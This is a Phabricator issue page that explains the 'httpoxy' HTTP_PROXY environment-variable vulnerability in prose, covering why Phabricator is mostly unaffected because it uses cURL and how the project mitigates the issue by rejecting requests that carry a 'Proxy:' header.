Page MenuHomePhabricator

"httpoxy" HTTP Proxy Environmental Vulnerability
Closed, ResolvedPublic


A vulnerability dubbed "httpoxy" was recently widely disclosed. You can find technical details about the disclosure in the general case here:

This issue discusses the vulnerability and Phabricator's response to it.

If you're coming here because you hit an error message on your install, it means one of two things:

  • You made a request with the "Proxy:" header. The only known use of this header is exploiting the "httpoxy" vulnerability. To resolve this issue, do not send requests with this header.
  • The environment variable HTTP_PROXY is defined. This is likely a mistake: cURL does not read this variable. To resolve this issue, unset this variable.
    • To configure HTTP proxying, use PhutilHTTPEngineExtension (T10227, recommended) or the http_proxy variable (lowercase, case-sensitive, read by cURL).

The remainder of this issue discusses the vulnerability in greater detail.

The "httpoxy" vulnerability takes advantage of environment variables starting with HTTP_ being writable by the client under CGI. For example, if you send an Xyz: header in an HTTP request, the value of the header will be written to the HTTP_XYZ environment variable.

Normally, environment variables beginning with HTTP_ are not interesting, but sending a Proxy: header (which has no meaning in HTTP) lets you write to HTTP_PROXY, which some libraries examine to configure proxying behavior. This could allow an attacker to send outbound HTTP requests originating in Phabricator through a proxy server they control, potentially reading sensitive information (for example, OAuth application secret keys).

Phabricator is generally not vulnerable because it uses cURL directly, and cURL only reads http_proxy (lowercase, case-sensitive), which this attack can not interact with, except on Windows NT (apparently) where Phabricator does not run. However, it's possible that we're vulnerable on systems using very old cURL (the fix appears to be fairly recent, from 2013) or when running with third-party extensions that cause us to execute other libraries which have vulnerabilities, or will run these in the future, or the stars and planets might align or whatever else.

Additionally, almost all requests Phabricator makes are either uninteresting (no secret data or credentials) or originate from the daemons (which can not be attacked), but at least some requests are potentially at least slightly interesting and web-originated (OAuth handshakes, Subversion HTTP requests to remote repositories).

After D16318, we will reject suspicious requests that appear to contain a Proxy: header out of an abundance of caution. We can't actually distinguish between the presence of a Proxy: header and the intended existence of an HTTP_PROXY environment variable, so this may raise false positives, but the variable is likely a mistake (cURL does not read it). You probably intend to set http_proxy instead.